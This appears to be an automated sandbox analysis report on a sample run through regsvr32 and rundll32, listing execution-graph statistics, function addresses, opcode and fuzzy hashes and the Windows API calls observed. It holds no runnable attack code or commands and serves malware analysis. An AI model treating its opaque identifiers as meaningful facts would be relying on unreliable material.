                                                            • Opcode Fuzzy Hash: e5025b078967fd85162d849e6098edee8e8ef69a15d09e8a1ef35b4e29b96f51
                                                            • Instruction Fuzzy Hash: 36C1E6B9901B468BD710CF65EE8838D7BB1BF86324F504319D6612B2F6DBB8144ACF44

                                                            Execution Graph

                                                            Execution Coverage:5.1%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:18
                                                            Total number of Limit Nodes:0
                                                            execution_graph 7419 43263c8 DuplicateHandle 7420 432645e 7419->7420 7421 4328448 7422 4328463 MessageBoxW 7421->7422 7424 43284d4 7422->7424 7425 43269df 7428 4326238 7425->7428 7429 4326243 7428->7429 7433 4327bb0 7429->7433 7437 4327bc0 7429->7437 7430 43269ec 7434 4327c0f 7433->7434 7441 4326394 7434->7441 7438 4327c0f 7437->7438 7439 4326394 EnumThreadWindows 7438->7439 7440 4327c90 7439->7440 7440->7430 7442 4327cb0 EnumThreadWindows 7441->7442 7444 4327c90 7442->7444 7444->7430

                                                            Executed Functions

                                                            Function 04328218 Relevance: 1.7, APIs: 1, Instructions: 237COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a7fed30b742ef56922f27cbbdb94a27dd705898fb494972ff8dd2c4c83dc0d7
                                                            • Instruction ID: 62db6c2f012737515318d3c282c3fa0cbd431c29a0a3fe006e6041b10d81d399
                                                            • Opcode Fuzzy Hash: 0a7fed30b742ef56922f27cbbdb94a27dd705898fb494972ff8dd2c4c83dc0d7
                                                            • Instruction Fuzzy Hash: CDA169B4A003598FDB18DFA9CA84BAFBBF5FF48314F159559E804AB251C734E841CB61
                                                            Function 043283F1 Relevance: 1.6, APIs: 1, Instructions: 73windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 59 43283f1-43283f8 60 4328463-432848b 59->60 61 43283fa-43283fd 59->61 64 4328493-4328497 60->64 65 432848d-4328490 60->65 62 4328455-432845c 61->62 63 43283ff-432840b 61->63 62->60 66 4328433-4328437 63->66 67 432840d-4328417 63->67 68 4328499-432849c 64->68 69 432849f-43284d2 MessageBoxW 64->69 65->64 67->66 74 4328419-4328432 67->74 68->69 70 43284d4-43284da 69->70 71 43284db-43284ef 69->71 70->71
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: b410e6f1b5cef0bec789f67b4a4f442f18ccdbf22a7d42e47e6b7e52a8e8c341
                                                            • Instruction ID: 645f59854a8f6a20dcb130399b97f602bc0e5c2676c0b2cfe86cba75f2881b7d
                                                            • Opcode Fuzzy Hash: b410e6f1b5cef0bec789f67b4a4f442f18ccdbf22a7d42e47e6b7e52a8e8c341
                                                            • Instruction Fuzzy Hash: A12187B59007198FDB18DF99D984BDABBF5FF88314F24851DE419AB620C774A801CF60
                                                            Function 04326387 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 77 4326387-4326395 78 4326397 77->78 79 4326398-4327cf2 77->79 78->79 81 4327cf4 79->81 82 4327cfe-4327d2e EnumThreadWindows 79->82 85 4327cfc 81->85 83 4327d30-4327d36 82->83 84 4327d37-4327d64 82->84 83->84 85->82
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: a79af812cfd13f667596338413888aa6db190ab5eaa444bc8c1192be0077a30b
                                                            • Instruction ID: 6e41ee116b62920ab594682dd535987209434a41b00d79431d4a2d81851b276e
                                                            • Opcode Fuzzy Hash: a79af812cfd13f667596338413888aa6db190ab5eaa444bc8c1192be0077a30b
                                                            • Instruction Fuzzy Hash: AE2139B190025A9FDB14CF9AC984BEFBBF4FF88320F14942AD454A3250D778A945CF65
                                                            Function 043263C1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 88 43263c1-432645c DuplicateHandle 89 4326465-4326482 88->89 90 432645e-4326464 88->90 90->89
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0432644F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 296fcc3e51457334c72f46cc7ab6947715c023961930241ebfc31edda807350a
                                                            • Instruction ID: 25a904bd285f02aa643e7cecffa4be6cebcd6db1bdcf97fbbb8973a40a955ec1
                                                            • Opcode Fuzzy Hash: 296fcc3e51457334c72f46cc7ab6947715c023961930241ebfc31edda807350a
                                                            • Instruction Fuzzy Hash: 8321E3B5900259DFDB10CFAAD984AEEBBF4EB48320F14841AE958A3310C778A945CF64
                                                            Function 04326394 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 93 4326394-4327cf2 95 4327cf4 93->95 96 4327cfe-4327d2e EnumThreadWindows 93->96 99 4327cfc 95->99 97 4327d30-4327d36 96->97 98 4327d37-4327d64 96->98 97->98 99->96
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: ae6702a2d4e2fb11ee9fb5cb68db2a54bef510cb8572cb4aca91c75b27108876
                                                            • Instruction ID: 3d017e85242c0410d45ef0ec9eb8b8145bff15e403b73249ad8db67d062613b7
                                                            • Opcode Fuzzy Hash: ae6702a2d4e2fb11ee9fb5cb68db2a54bef510cb8572cb4aca91c75b27108876
                                                            • Instruction Fuzzy Hash: EC2129719006598FEB14CF9AC944BEEFBF5FB88320F14842AD814A3250D778A945CFA5
                                                            Function 043263C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 102 43263c8-432645c DuplicateHandle 103 4326465-4326482 102->103 104 432645e-4326464 102->104 104->103
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0432644F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: f46781535441482839caeaaa7978bd2686b07b9dc120d6094f007bb100fd4eed
                                                            • Instruction ID: 46b9a98345af73700a307f011a030b5eeaf6149e99e19849dcc37d7815750672
                                                            • Opcode Fuzzy Hash: f46781535441482839caeaaa7978bd2686b07b9dc120d6094f007bb100fd4eed
                                                            • Instruction Fuzzy Hash: 2F21E4B59003599FDB10CFAAD984ADEBBF4EB48720F14841AE958A3310D778A944CF61
                                                            Function 04327CA9 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 107 4327ca9-4327cf2 108 4327cf4 107->108 109 4327cfe-4327d2e EnumThreadWindows 107->109 112 4327cfc 108->112 110 4327d30-4327d36 109->110 111 4327d37-4327d64 109->111 110->111 112->109
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E58,?,?,04327C90,056C40EC,?), ref: 04327D21
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 4f5d24c8e52c84150b85205f0756f49b4ec2f613d18b456c47bd580b76fbee87
                                                            • Instruction ID: 08a5f644c369380f15313dece58576e56fd0c977f9736db14397b6c88d53436f
                                                            • Opcode Fuzzy Hash: 4f5d24c8e52c84150b85205f0756f49b4ec2f613d18b456c47bd580b76fbee87
                                                            • Instruction Fuzzy Hash: D52129719002598FDB14CF9AC944BEEFBF5FB88320F14842AD454A3250D778A945CFA5
                                                            Function 04328440 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 115 4328440-432848b 118 4328493-4328497 115->118 119 432848d-4328490 115->119 120 4328499-432849c 118->120 121 432849f-43284d2 MessageBoxW 118->121 119->118 120->121 122 43284d4-43284da 121->122 123 43284db-43284ef 121->123 122->123
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: cdda297f2c647c24eecc15248f48fac392639b46076f642e3d7d273f403018b1
                                                            • Instruction ID: edc296c6c77876e4f588c3e4766472a5259f0cde68376f1707e25e003e5c692d
                                                            • Opcode Fuzzy Hash: cdda297f2c647c24eecc15248f48fac392639b46076f642e3d7d273f403018b1
                                                            • Instruction Fuzzy Hash: 382134B68007599FDB14CF9AC984ADEFBF5FB48314F10852EE418A7600C374A944CBA0
                                                            Function 04328448 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 125 4328448-432848b 127 4328493-4328497 125->127 128 432848d-4328490 125->128 129 4328499-432849c 127->129 130 432849f-43284d2 MessageBoxW 127->130 128->127 129->130 131 43284d4-43284da 130->131 132 43284db-43284ef 130->132 131->132
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?), ref: 043284C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1625211278.0000000004320000.00000040.00000800.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_4320000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 2a6c1da5996f57ae52cd74754bbe6dd3ceb9c6e92f78c8fa11214a8448a2be3a
                                                            • Instruction ID: c614505eeac30dbb3951a3874f05adf9b25e2900fa2c6f64cf0f7d53a642645a
                                                            • Opcode Fuzzy Hash: 2a6c1da5996f57ae52cd74754bbe6dd3ceb9c6e92f78c8fa11214a8448a2be3a
                                                            • Instruction Fuzzy Hash: 062113B68007599FDB14DF9AD984ADEFBB5FB48314F14892ED518A7600C374A544CBA0
                                                            Function 0427D01C Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1624914646.000000000427D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0427D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_427d000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f2a06e7758a0e934981d2417afd3957809f59caee92ee3c44c8b4cb45858eb19
                                                            • Instruction ID: 6cc595c1d175871453ab3b6f1fcb1ecd4b463ceba4b5cca4e0311f701161d93a
                                                            • Opcode Fuzzy Hash: f2a06e7758a0e934981d2417afd3957809f59caee92ee3c44c8b4cb45858eb19
                                                            • Instruction Fuzzy Hash: 971174B17783409FEB10EF24E9C4B26BBA4FF80714F208A6CD4094B241D37AE447C662
                                                            Function 0427D006 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1624914646.000000000427D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0427D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_427d000_regsvr32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1c1b2292c77ff2163261a03acf8243405760f1c3d7328999ce831efd2f5a938
                                                            • Instruction ID: f925c83af2496d06994d105b6d1108f03138d1c6e2918c826aaa8adf41d1696a
                                                            • Opcode Fuzzy Hash: f1c1b2292c77ff2163261a03acf8243405760f1c3d7328999ce831efd2f5a938
                                                            • Instruction Fuzzy Hash: 5811A3716197C08FDB12DF24D994715BF71EF42314F288AEAC489CB693C33A944ACB62

                                                            Execution Graph

                                                            Execution Coverage:4.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:53
                                                            Total number of Limit Nodes:1
                                                            execution_graph 8300 4ea85a8 8301 4ea85ed MessageBoxW 8300->8301 8303 4ea8634 8301->8303 8304 4ea63c8 DuplicateHandle 8305 4ea645e 8304->8305 8306 4ea69df 8309 4ea6238 8306->8309 8310 4ea6243 8309->8310 8314 4ea7bc0 8310->8314 8318 4ea7bb0 8310->8318 8311 4ea69ec 8315 4ea7c0f 8314->8315 8322 4ea6394 8315->8322 8319 4ea7bc0 8318->8319 8320 4ea6394 EnumThreadWindows 8319->8320 8321 4ea7c90 8320->8321 8321->8311 8323 4ea7cb0 EnumThreadWindows 8322->8323 8325 4ea7c90 8323->8325 8325->8311 8326 4e4d01c 8327 4e4d030 8326->8327 8328 4e4d070 8327->8328 8332 4ea0848 8327->8332 8335 4ea0874 8327->8335 8340 4ea0838 8327->8340 8344 4ea4db5 8332->8344 8333 4ea0869 8333->8328 8336 4ea0832 8335->8336 8337 4ea0882 8335->8337 8339 4ea4db5 OleInitialize 8336->8339 8338 4ea0869 8338->8328 8339->8338 8341 4ea0848 8340->8341 8343 4ea4db5 OleInitialize 8341->8343 8342 4ea0869 8342->8328 8343->8342 8346 4ea4dce 8344->8346 8345 4ea4fe7 8345->8333 8346->8345 8349 4ea571f 8346->8349 8353 4ea5730 8346->8353 8350 4ea5730 8349->8350 8357 4ea4d28 8350->8357 8354 4ea5739 8353->8354 8355 4ea4d28 OleInitialize 8354->8355 8356 4ea5744 8355->8356 8356->8345 8358 4ea4d33 8357->8358 8361 4ea6228 8358->8361 8360 4ea69a2 8362 4ea6233 8361->8362 8364 4ea6a81 8362->8364 8365 4ea630c 8362->8365 8364->8360 8367 4ea6317 8365->8367 8366 4ea6dbb 8366->8364 8367->8366 8369 4ea6328 8367->8369 8370 4ea6df0 OleInitialize 8369->8370 8371 4ea6e54 8370->8371 8371->8366

                                                            Executed Functions

                                                            Function 04EA63C1 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4ea63c1-4ea63c7 1 4ea63c8-4ea645c DuplicateHandle 0->1 2 4ea645e-4ea6464 1->2 3 4ea6465-4ea6482 1->3 2->3
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EA644F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 775b027ffc9d4ef4b0e1d3f3c2422165daa151ffacb3bd337280e6c36b29c948
                                                            • Instruction ID: c6f1db283c1c7e77d4966a5cffd87657dbd16003e1c1715ee668f0d220062d42
                                                            • Opcode Fuzzy Hash: 775b027ffc9d4ef4b0e1d3f3c2422165daa151ffacb3bd337280e6c36b29c948
                                                            • Instruction Fuzzy Hash: 8021E5B5900309DFDB10CFAAD884ADEBBF8FB48720F14841AE958A7250D374A954CFA5
                                                            Function 04EA63C8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 15 4ea63c8-4ea645c DuplicateHandle 16 4ea645e-4ea6464 15->16 17 4ea6465-4ea6482 15->17 16->17
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EA644F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 9a84ff9bf4c957e4bc268fc67f7a00f0f46867f96300f455efd70288f35280dc
                                                            • Instruction ID: 4f4c5aabf86306c2c91ef5e63fe72821fb8a9e220e9885d0bfbd0c02f1b797ea
                                                            • Opcode Fuzzy Hash: 9a84ff9bf4c957e4bc268fc67f7a00f0f46867f96300f455efd70288f35280dc
                                                            • Instruction Fuzzy Hash: 6821E4B59003099FDB10CFAAD884ADEFBF8FB48310F14801AE958A7310D378A950CF65
                                                            Function 04EA6394 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 6 4ea6394-4ea7cf2 8 4ea7cfe-4ea7d2e EnumThreadWindows 6->8 9 4ea7cf4 6->9 10 4ea7d30-4ea7d36 8->10 11 4ea7d37-4ea7d64 8->11 12 4ea7cfc 9->12 10->11 12->8
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,04EA7C90,061F40EC,?), ref: 04EA7D21
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 7913fe523227443081e020972e101fe04c22c0e9e33bfd5e704cf53a63f40b9e
                                                            • Instruction ID: 9d75e2e51974047e8175be889fd85e477ee0dcf03af92fa3bc40876fd4a34a04
                                                            • Opcode Fuzzy Hash: 7913fe523227443081e020972e101fe04c22c0e9e33bfd5e704cf53a63f40b9e
                                                            • Instruction Fuzzy Hash: A421F9B1900249DFDB14DF9AC844BEEFBF5FB88320F14842AD854A7250D778A945CFA5
                                                            Function 04EA7CA9 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 20 4ea7ca9-4ea7cf2 22 4ea7cfe-4ea7d2e EnumThreadWindows 20->22 23 4ea7cf4 20->23 24 4ea7d30-4ea7d36 22->24 25 4ea7d37-4ea7d64 22->25 26 4ea7cfc 23->26 24->25 26->22
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,04EA7C90,061F40EC,?), ref: 04EA7D21
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 760ea7c2d90ff62a9cca5f8b6d8f9ba2c67c19e57b30485c1abd47a66045bbd2
                                                            • Instruction ID: 8df2a9429651b38a89b5bf9a0d7a6b17149470815857bf2251bfe2fbd4696648
                                                            • Opcode Fuzzy Hash: 760ea7c2d90ff62a9cca5f8b6d8f9ba2c67c19e57b30485c1abd47a66045bbd2
                                                            • Instruction Fuzzy Hash: 582127719002098FDB14CFAAC844BEEFBF9FB88320F14842AD814A7250D778A945CFA5
                                                            Function 04EA85A0 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 29 4ea85a0-4ea85eb 31 4ea85ed-4ea85f0 29->31 32 4ea85f3-4ea85f7 29->32 31->32 33 4ea85f9-4ea85fc 32->33 34 4ea85ff-4ea8632 MessageBoxW 32->34 33->34 35 4ea863b-4ea864f 34->35 36 4ea8634-4ea863a 34->36 36->35
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 04EA8625
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 9bdbb3e85f43c80860d3228babac98644f41d35e848bd302f5e226c9f27817fa
                                                            • Instruction ID: 2350c79035b6f2fed8521bb2f869dc5d3e679faed545db89bb0472b4e86ae7d4
                                                            • Opcode Fuzzy Hash: 9bdbb3e85f43c80860d3228babac98644f41d35e848bd302f5e226c9f27817fa
                                                            • Instruction Fuzzy Hash: 8721E2B5C003499FDB14DF9AD984ADEFBF5FB88314F14892ED818A7210C375A944CBA5
                                                            Function 04EA85A8 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 38 4ea85a8-4ea85eb 39 4ea85ed-4ea85f0 38->39 40 4ea85f3-4ea85f7 38->40 39->40 41 4ea85f9-4ea85fc 40->41 42 4ea85ff-4ea8632 MessageBoxW 40->42 41->42 43 4ea863b-4ea864f 42->43 44 4ea8634-4ea863a 42->44 44->43
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 04EA8625
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 8f761f7b92606f25b76dd902a693c003b16ecbcfa53eb3db4d3bf266b1440612
                                                            • Instruction ID: c1c664170aacfa4d48e4ad41ea40422e24ffd666c5529a657c533e70f46725c4
                                                            • Opcode Fuzzy Hash: 8f761f7b92606f25b76dd902a693c003b16ecbcfa53eb3db4d3bf266b1440612
                                                            • Instruction Fuzzy Hash: 9D2102B5C003499FDB14DF9AD884ADEFBF5FB88314F14892ED818A7200C375A944CBA5
                                                            Function 04EA6DE8 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 46 4ea6de8-4ea6def 47 4ea6df0-4ea6e52 OleInitialize 46->47 48 4ea6e5b-4ea6e78 47->48 49 4ea6e54-4ea6e5a 47->49 49->48
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04EA6E45
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 82b116b353a18f8b718cdd41ea33b91c61920e4aac5687acf4cdd3d2a846fdec
                                                            • Instruction ID: 8f755d715e83ffc3d42da0b4444a4256959c1844851d9d85a5ec95d12b397876
                                                            • Opcode Fuzzy Hash: 82b116b353a18f8b718cdd41ea33b91c61920e4aac5687acf4cdd3d2a846fdec
                                                            • Instruction Fuzzy Hash: 0B1145B5800349CFDB20CFAAD449BDEFBF8EB49724F208419D558A7600C378A644CFA5
                                                            Function 04EA6328 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 52 4ea6328-4ea6e52 OleInitialize 54 4ea6e5b-4ea6e78 52->54 55 4ea6e54-4ea6e5a 52->55 55->54
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04EA6E45
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: fb4240fea61dd210c8e3dad78b5e3786577724a1870b4c3f7be8cfbfbf8fc414
                                                            • Instruction ID: 6a748b906ca95858b9e46d78e49a55774ed6e9b39ceff600399878a3c03779b1
                                                            • Opcode Fuzzy Hash: fb4240fea61dd210c8e3dad78b5e3786577724a1870b4c3f7be8cfbfbf8fc414
                                                            • Instruction Fuzzy Hash: 951145B4900349CFDB20DFAAC444BDEFBF4EB48324F248419D558A7210D378A940CFA5
                                                            Function 04E4D0DC Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4bd2838abb7b2b2264b50204f6839d8a3b94f27078230b45ec1689e5b3a89be
                                                            • Instruction ID: 53349870f22ef5eeca105e3204f5a12d791fe1a174fd7da63d017248e92ce652
                                                            • Opcode Fuzzy Hash: b4bd2838abb7b2b2264b50204f6839d8a3b94f27078230b45ec1689e5b3a89be
                                                            • Instruction Fuzzy Hash: BB21C0B5604344DFEB05DF24ED84F26BBA5FBC4628F20C66DD8494B741C37AE846C6A2
                                                            Function 04E4D01C Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 556ad57ce388ec47e5f5be8efa67d0e0d9fb4bec1f07fd0d867bcb76610df5f8
                                                            • Instruction ID: e399c342fb9db62912e911c10507a64aa1e61e7fcb6e43091a2dd394928425d7
